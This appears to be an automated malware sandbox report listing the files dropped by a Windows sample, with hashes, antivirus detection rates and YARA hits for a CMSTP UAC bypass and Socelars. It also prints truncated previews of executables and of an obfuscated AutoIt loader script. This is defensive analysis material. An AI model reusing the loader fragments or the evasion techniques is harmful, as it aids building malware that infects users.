                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}.........g.....8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                Entropy (8bit):0.8182303930711242
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:+RMKLyeymwxCn8MZyFltK3PlGNxot83n:+RkxGO8PlGNxz
                                                                                                                                                                                                                                MD5:A93B35941137916187814E3E7C88C93D
                                                                                                                                                                                                                                SHA1:3834E7B2A614BD688831CFC47786729F6CAC0121
                                                                                                                                                                                                                                SHA-256:0D1DC0E9F4C9BE281E17D24AC969E0FF3F8388114420417126A4F502EABC3107
                                                                                                                                                                                                                                SHA-512:84A749B77BBED02944C9B25D1B98C638B3DBB906A2A222FF9FB229C7AC0C8A64D123D1CB47A1E9A88FB9E67BAD0928FE1C952152F30311EFC6C8B9330B9441B4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):77824
                                                                                                                                                                                                                                Entropy (8bit):5.844474283756578
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:P3rtHL1uKHMbw0KyJKNhkKqEAq/YDC+ggWo+rWEGmlH6W/mqsBdnmz5BZEyY7t8z:fr1RupbQauqK/jhrP/mgnat8z
                                                                                                                                                                                                                                MD5:1725996A931F0F5164CB69E713608F1F
                                                                                                                                                                                                                                SHA1:40C2BA674FCBEEFAAE4BF0E684347BA75CE4E66B
                                                                                                                                                                                                                                SHA-256:E6FE65BF78DAC0AE91F706E5B382D5BCB9699B0D754DDDC8C00F4716CA209E5A
                                                                                                                                                                                                                                SHA-512:B478B3DB392BD072E5DD23A705C71EE75DFC7909139410DE4E32C96A28BECBF84C8788BDFC6F3A5F00AAA30227C7D1611F4B40A73D9564BAD2B8C80402A8185A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 33%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!.v.!.v.!.v..). .v..N..5.v..N....v..N..z.v..+.&.v.!.w.F.v..N..#.v..N.. .v.Rich!.v.........PE..L....>)c.....................`.......$............@..........................@......~...........................................P....0.............................................................. ...@...............T............................text.............................. ..`.rdata...*.......0..................@..@.data....!....... ..................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3632640
                                                                                                                                                                                                                                Entropy (8bit):7.798909542768245
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:uD8Q1YEC3D2jvmA86mGdWE3h8OMNzE69URP+:C8Q1bCajuA869ufDAP+
                                                                                                                                                                                                                                MD5:2F8CBF74871165688C040E0C95DCE0F0
                                                                                                                                                                                                                                SHA1:FB1AE30EAF62B936FFAF3DB8B72139BD3E265965
                                                                                                                                                                                                                                SHA-256:BE3D6E0C3F530725FB7E4F0572CB17B5F87949EA6F8F3110DD3A23025BD06A03
                                                                                                                                                                                                                                SHA-512:03062213163D13B02C299437B8893D2B69B7EF6158DCCE8313EBE32A9590EE66811B8F727ECBDFAC378204F5E6CD8FFF83CB1A524B8F501D13BE5E842E3F4B5E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....F8c..........#.................(.,........@..............................`........... .................................................X.).............@.`.l...........................................H.;.0.....`.0.............K..............................text............................... ..`.rdata..............................@..@.data..............................@....pdata..d....0......................@..@_RDATA..............................@..@.vmp0....H..........................`..`.vmp1....i7.. )..j7.................`..h........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):520704
                                                                                                                                                                                                                                Entropy (8bit):2.4908605030636943
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:gSvNWMz7EVXU/hVJ+7hSYfGJsQO849wk9ESnGCuqqyUq60atL+Qs1ysiRgiSlmmU:hI47GyTGCwiSnmQUt0LB1ysKs5gT
                                                                                                                                                                                                                                MD5:362A6081EAFE20BBCBA11658A6968CF6
                                                                                                                                                                                                                                SHA1:9020D7F836F1C78D49DEDC862F9F9D1131A5AC99
                                                                                                                                                                                                                                SHA-256:52081FA70A610D9888FB00BED23A6A1F7124C103476CC5258A6932C5CF377AA2
                                                                                                                                                                                                                                SHA-512:0740FC62E8443D9D7E38D2E9B91B696E5B4DAF92C8B9D43079AA91DCE097948FA7C87726EEFD2E20B5C2FDA83B446D251ED4B47BE10D04C674AB038FA6AA2A59
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......le.Z(...(...(...Mb..)...Mb..*...Mb..:...Mb..9...(.......Mb..!...Mbh.)...Mb..)...Rich(...........................PE..d................."......t...z.......y.........@.............................P......H.....`.......... ...................................................J...................@.. .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc....J.......L..................@..@.reloc.. ....@......................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1107968
                                                                                                                                                                                                                                Entropy (8bit):7.998152820755428
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:24576:zmWAbXH84DRnKCwyElWCAMmKix1x1IDStOX2cBZ8umx7QgbcxWsG2:zmXL8uokzK6DxcD8uqzbcxWX
                                                                                                                                                                                                                                MD5:78C42D6817AF1AD96CABDF6FF2F7F3DA
                                                                                                                                                                                                                                SHA1:ABEADCEE8D9F00C6CCDB0F9D33EDD1006A079384
                                                                                                                                                                                                                                SHA-256:38B2C7A1AF454D382927F81543D86055886BC028634575050367D052EFD26434
                                                                                                                                                                                                                                SHA-512:76A3B3E6AE0EA0F17661314FE391EC8B9B580A7ECFEE0EBE2D830DB3843D5D929D6BF3ADB8CB03F6B87212A607CE001700EA3DC305828C817FF017DD3B766811
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-/..C|..C|..C|...|..C|...|..C|...|..C|...|..C|...|..C|...|..C|...|..C|..B|.C|..|..C|..|..C|...|..C|..|..C|Rich..C|................PE..L....o"c..............................)...........@...........................)...........@...................................)......P'.......................).........8............................................................................text...............................`....rdata... ..........................@....data....P....&..*..................@....rsrc........P'.....................@....reloc...P...`'.....................@....ask..... ....).....................`....adata........).....................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):12722472
                                                                                                                                                                                                                                Entropy (8bit):7.979757251065637
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:196608:8ZhuxUqr8arjzvp/lrMbq/zJhgRCyy8vMXkixKV8UrAPcADUXpmCt3Fe:ChSUs3rHx/lQbq7oTy8mkiICU0nAX73Q
                                                                                                                                                                                                                                MD5:19B20FC498D366730C470BACAB083FE7
                                                                                                                                                                                                                                SHA1:9D63950C73423991E2884392BC9682D836F9E031
                                                                                                                                                                                                                                SHA-256:8A227B80714A2EE25F04541F20C7BCEE3063D96541DDE42E9C99523E2CD74341
                                                                                                                                                                                                                                SHA-512:0C03E865381FAB1E06B2C42F70A3183BD96B06EAA6524F9D254FF708859B89C92A5F7C7186C84888BD543AD1CBF3D45CA4125ACDAEC059751E9BA2097F90DEDB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 31%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...'..`.................P...........^.......p....@.................................N_....@......@...................@....... ..6....p...o..........x..../...................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....o...p...p..................@..@....................................@..@........................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1503744
                                                                                                                                                                                                                                Entropy (8bit):6.583923716028267
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:O9pET4HuaBA0em3dpIrC6TyB1VehW6EpKp/IcFUfaI+8/DcHz:2plHHRBBoThgeUfaN8rcHz
                                                                                                                                                                                                                                MD5:E3C664A4A00BCBD6BD73D48169421458
                                                                                                                                                                                                                                SHA1:BD73D28DA633E9834E98E1AAACC1B20C07499998
                                                                                                                                                                                                                                SHA-256:52DFCFF75865963123536527CBC4B308462197C4F4A9A89312157B8367CA0521
                                                                                                                                                                                                                                SHA-512:E6152842DA870EE06C480885119620C2B9EBCFF27D4944CC526F63EB317E82E13E13769C61E94F7FA7C41D74223A8C7576A6A362691F1415E203071B0F85E015
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exe, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........7.kBVc8BVc8BVc8V=`9RVc8V=f9.Vc8.#f9.Vc8.#g9PVc8.#`9XVc8.#k9CVc8V=g9ZVc8V=e9CVc8V=b9UVc8BVb8.Vc8.#g9EVc8.#f9SVc8.#.8CVc8BV.8CVc8.#a9CVc8RichBVc8................PE..L.....8c............................c{............@.......................................@..................................z....... ..............................p...8...............................@............................................text...1A.......B.................. ..`.ljhskbs.Z...`...\...F.............. ..`.rdata..............................@..@.data....w...........n..............@....ljhskbsP...........................@....rsrc........ ......................@..@.reloc...............n..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1503744
                                                                                                                                                                                                                                Entropy (8bit):6.583923716028267
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:O9pET4HuaBA0em3dpIrC6TyB1VehW6EpKp/IcFUfaI+8/DcHz:2plHHRBBoThgeUfaN8rcHz
                                                                                                                                                                                                                                MD5:E3C664A4A00BCBD6BD73D48169421458
                                                                                                                                                                                                                                SHA1:BD73D28DA633E9834E98E1AAACC1B20C07499998
                                                                                                                                                                                                                                SHA-256:52DFCFF75865963123536527CBC4B308462197C4F4A9A89312157B8367CA0521
                                                                                                                                                                                                                                SHA-512:E6152842DA870EE06C480885119620C2B9EBCFF27D4944CC526F63EB317E82E13E13769C61E94F7FA7C41D74223A8C7576A6A362691F1415E203071B0F85E015
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........7.kBVc8BVc8BVc8V=`9RVc8V=f9.Vc8.#f9.Vc8.#g9PVc8.#`9XVc8.#k9CVc8V=g9ZVc8V=e9CVc8V=b9UVc8BVb8.Vc8.#g9EVc8.#f9SVc8.#.8CVc8BV.8CVc8.#a9CVc8RichBVc8................PE..L.....8c............................c{............@.......................................@..................................z....... ..............................p...8...............................@............................................text...1A.......B.................. ..`.ljhskbs.Z...`...\...F.............. ..`.rdata..............................@..@.data....w...........n..............@....ljhskbsP...........................@....rsrc........ ......................@..@.reloc...............n..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\l39HA25qjw.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):883018
                                                                                                                                                                                                                                Entropy (8bit):5.5347049683486285
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:IrFzcJWcC8112yuAL5ds/o4H1kF8m8GY56LXL0eDB8vb122:kzcJfPjL5dkH1+LB8vb1Z
                                                                                                                                                                                                                                MD5:8645E4B60A09CB8DCCE1CB6903400645
                                                                                                                                                                                                                                SHA1:569E6B2C2094305E8B7659D8E51765F6B22BA4A1
                                                                                                                                                                                                                                SHA-256:C94A6564C1A9511665C58659BC1F01EA88EFEED97E5C7934FBC0E165454FF53B
                                                                                                                                                                                                                                SHA-512:7012D47932C4ABB1F372EDBE667BDBDA54D1B2BA23E8015DA6F2642E49B120BF711E0F6BADFE08D96BEAC82BA0915143D1037EBAA80ADD9F01E26EFAA7BE1DBC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:$acceptfellowchryslerequippedbadeverychallengeddisclaimersexamplelit = bVrMczLosANWqI("88l90l84l72l105l71l70l79l100l106l87l82l84l120l113l103l108",3)..$courtesyInappropriateSimilarlyBabyRegionsSrTitsVirtually = 122523..$sequencesTattooHiltonCurvesPlasmaPrinciple = 66..While 8502617..Switch $courtesyInappropriateSimilarlyBabyRegionsSrTitsVirtually..Case 122521..$trackerThoughtsKidHighlandPastHawaiianBrazilian = 2..If $wilsonbelgiumfriendshipinchesprotesttowersebayph > 33 Then..$cosAnnouncesSurvivePoliticiansBcYukonNsRelax = 9887252..Execute('Ptr(37)')..$HOLDFLAGSASSISTANCETHE = $HOLDFLAGSASSISTANCETHE + (241611 / 241611)..EndIf..$courtesyInappropriateSimilarlyBabyRegionsSrTitsVirtually = $courtesyInappropriateSimilarlyBabyRegionsSrTitsVirtually + 1..Case 122522..$RetrievalUtPromotedStudioOilRelevanceMid = 8..If $quotationsbrighttunestrapmaterialaffairnumbers > 31 Then..$TomatoesLodgeDecoratingEcologicalInvestingRnaMidiHavingAffiliation = 9634785..Execute(bVrMczLosANWqI("77l92l115l105l45l
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):946776
                                                                                                                                                                                                                                Entropy (8bit):6.630605981477972
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:LErOxpVnqgt5ExLh27RQlf7Yfq2WZz2a1BB69:L86pqeE74aB0Sdia1W9
                                                                                                                                                                                                                                MD5:6987E4CD3F256462F422326A7EF115B9
                                                                                                                                                                                                                                SHA1:71672A495B4603ECFEC40A65254CB3BA8766BBE0
                                                                                                                                                                                                                                SHA-256:3E26723394ADE92F8163B5643960189CB07358B0F96529A477D37176D68AA0A0
                                                                                                                                                                                                                                SHA-512:4B1D7F7FFEE39A2D65504767BEEDDD4C3374807A93889B14E7E73DB11E478492DEC349AEDCA03CE828F21A66BB666A68D3735443F4249556E10825A4CD7DFEB4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 4%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L.....$b.........."...............................@.......................................@...@.......@.....................t...|....P..P............L..X&...0..Xv...........................C..........@............................................text...f........................... ..`.rdata..............................@..@.data...\p.......H..................@....rsrc...P....P......................@..@.reloc..Xv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\l39HA25qjw.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):946786
                                                                                                                                                                                                                                Entropy (8bit):6.6306274291876655
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:5ErOxpVnqgt5ExLh27RQlf7Yfq2WZz2a1BB69:586pqeE74aB0Sdia1W9
                                                                                                                                                                                                                                MD5:41D097D9E09EB665057578B1B14E2372
                                                                                                                                                                                                                                SHA1:2D5B4DAF45F99FB194D4634259B6C1758D78DEDE
                                                                                                                                                                                                                                SHA-256:CA137E1A72FF46E30098167AB12A698B910FD0B8E0219FB29B0318D1AB22B14B
                                                                                                                                                                                                                                SHA-512:FC4B0D8D594F4C362590066BFABC683E7E1284B483A32C97F5BCEF53E9C65A9303C9BFF5413DAF93928B3F7908942CB9124D15E331DB0390C91D78710A580B0B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:xAuYKKZEsy........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L.....$b.........."...............................@.......................................@...@.......@.....................t...|....P..P............L..X&...0..Xv...........................C..........@............................................text...f........................... ..`.rdata..............................@..@.data...\p.......H..................@....rsrc...P....P......................@..@.reloc..Xv...0...x..................@..B......................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\l39HA25qjw.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):12386
                                                                                                                                                                                                                                Entropy (8bit):5.813633627440844
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:hgdXJpIR/Qhv0rPT29ZOGE/qrDhOrE9/qrD//rciwc:h0pIR/QhcbT29ZOGE/qrDhOrE9/qrD/J
                                                                                                                                                                                                                                MD5:18FFB337EE22619001644CB6574B6CDE
                                                                                                                                                                                                                                SHA1:F2502D02D4B2CCE1F96F51E926D91E8C9D8BEFBB
                                                                                                                                                                                                                                SHA-256:240F058C9BD383FBAB679005E81C06276684697E83E7C992B2A6456A30046527
                                                                                                                                                                                                                                SHA-512:CF04D3E96AB6960AB8297185B33EA538226C6AE41670C042444C9020D848CFBA3809CEAF067B9959F7467E7832A6E958702E9D445F3B98E4EE44923942DB274D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:raLqKieLpfyzjdRTKuAvWmPmznul=PMseGCJpHBxCaHzm..qgMYrXZUYEDjGjwScxDNdFOoJe=uUDRvZCbSbaMOaoHYuXwf..JXhQLAxAEgqzSZcMu=tOoxrIOcoYQwMw..MlFDFhweaTrLcmo=kZKWAlgUFwfavK..CYruOPpBYrMQBZWzWZMF=eyPCVLYEYIG..sBMazzcwnLTOxNUIHzaJtmm=gETtkWqxyilblwDFsDEdkqioQfW..Set TNuVMNVTOzsewqdmtEKLNiDQQzBFeVIkCEtRJEkjEDRNrm=x..ZMeGNaUFzRd=DEwWSlPaQtVCgxmIpqiIwIaOS..UVBtTtIHAECvDuocgVRA=aSjcaJINVkjrddUR..lRTHUUyMbqAFzbXalCegIAxq=FafzjQhECKqGKnYiIUIiiBOfLuO..CeJvTNfCPzkljqRMXMmrtiZFLS=rDqHuevemqDMXpcsfJnViKes..GKMxetLqwkYOMyoPXsLxZCUIQKWhW=zBJImsKIbWRLVXbCCEfyp..sXZrPrEsonrvSbyrF=yfUOChGWkhosXRcqlMJvBHryOz..myqvmZnqTnCxLvTRspQAjwS=zzofnjPqpGiRkQI..mQBBHsYZIPMVYTxbh=ruQpCHJCkyfwGABbwvAdFwxpG..mTwdkKEbNBCdgTRyuTKHokz=RYXWiwLGDTiPAUUEbpNZ..Set dWDRwSrPAsQBKnIjCvnGPMaBVoHhvKhVZvtpEzvsX=l..RPSwpYYMUbVJCzPBPySscvl=EFOoeSMEPshxuvkJotvZMbI..OQrpiyjcElvDpPJeLdUlucczU=osZkWiXqxjOCv..tRPVZHmzxxgcDbHzcKfXWVv=gfFocbhpUlygFmxhJ..WFWBEAaqQtjmMpccHJesYWuyB=szNVfegiZQvMLyPxG..WxbWSlRKlaQZn=ZkoZjUOlkFlEZUYWBDfXouVcBD..FRVdZsENmXQ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1696752
                                                                                                                                                                                                                                Entropy (8bit):6.289245533856013
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:ii1trs9xgh4uC6t6B8R9Hb6fvTCK4KtwZ7E3r5am7/Wjh5a6PaDKpN:iVxgOuiB8RBb6WGwO8zSDo
                                                                                                                                                                                                                                MD5:83D0087A8DC3B0EE76F68FB273FFF863
                                                                                                                                                                                                                                SHA1:019AC92ECD80B9FA6CA9E3F6D09E649CE325ECB5
                                                                                                                                                                                                                                SHA-256:4883769CFC1F8633A37A179D3B4AB41CF30B75190ECCF34056F1489648C310C6
                                                                                                                                                                                                                                SHA-512:7A1D1D0EB8B7C55570EAC75445152899B3C371A430F4B31EE2F88430AC3425BF34221AF9E09DAA1E30CBEE508A749E9B1534904EE187C19272330ACEE915337C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-.=FizS.izS.izS.2.P.jzS.}.S.hzS.}.P./zS.}.].q{S.}.V.rzS.}.W..zS.}...hzS.}.Q.hzS.RichizS.........................PE..L...*.2............!.........................0....(K.........................0.......|....@A........................ ...U................................[.......Q...r..p........................... ................................................text...u........................... ..`PAGE....*........................... ..`RT........... ...................... ..`.data...TZ...0......................@....mrdata.x#.......$..................@....00cfg...............6..............@..@.rsrc................8..............@..@.reloc...Q.......R...6..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):883018
                                                                                                                                                                                                                                Entropy (8bit):5.5347049683486285
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:IrFzcJWcC8112yuAL5ds/o4H1kF8m8GY56LXL0eDB8vb122:kzcJfPjL5dkH1+LB8vb1Z
                                                                                                                                                                                                                                MD5:8645E4B60A09CB8DCCE1CB6903400645
                                                                                                                                                                                                                                SHA1:569E6B2C2094305E8B7659D8E51765F6B22BA4A1
                                                                                                                                                                                                                                SHA-256:C94A6564C1A9511665C58659BC1F01EA88EFEED97E5C7934FBC0E165454FF53B
                                                                                                                                                                                                                                SHA-512:7012D47932C4ABB1F372EDBE667BDBDA54D1B2BA23E8015DA6F2642E49B120BF711E0F6BADFE08D96BEAC82BA0915143D1037EBAA80ADD9F01E26EFAA7BE1DBC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:$acceptfellowchryslerequippedbadeverychallengeddisclaimersexamplelit = bVrMczLosANWqI("88l90l84l72l105l71l70l79l100l106l87l82l84l120l113l103l108",3)..$courtesyInappropriateSimilarlyBabyRegionsSrTitsVirtually = 122523..$sequencesTattooHiltonCurvesPlasmaPrinciple = 66..While 8502617..Switch $courtesyInappropriateSimilarlyBabyRegionsSrTitsVirtually..Case 122521..$trackerThoughtsKidHighlandPastHawaiianBrazilian = 2..If $wilsonbelgiumfriendshipinchesprotesttowersebayph > 33 Then..$cosAnnouncesSurvivePoliticiansBcYukonNsRelax = 9887252..Execute('Ptr(37)')..$HOLDFLAGSASSISTANCETHE = $HOLDFLAGSASSISTANCETHE + (241611 / 241611)..EndIf..$courtesyInappropriateSimilarlyBabyRegionsSrTitsVirtually = $courtesyInappropriateSimilarlyBabyRegionsSrTitsVirtually + 1..Case 122522..$RetrievalUtPromotedStudioOilRelevanceMid = 8..If $quotationsbrighttunestrapmaterialaffairnumbers > 31 Then..$TomatoesLodgeDecoratingEcologicalInvestingRnaMidiHavingAffiliation = 9634785..Execute(bVrMczLosANWqI("77l92l115l105l45l
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                Entropy (8bit):3.375
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:xs:2
                                                                                                                                                                                                                                MD5:F2483E4908631C60551AD1A49E6E33AF
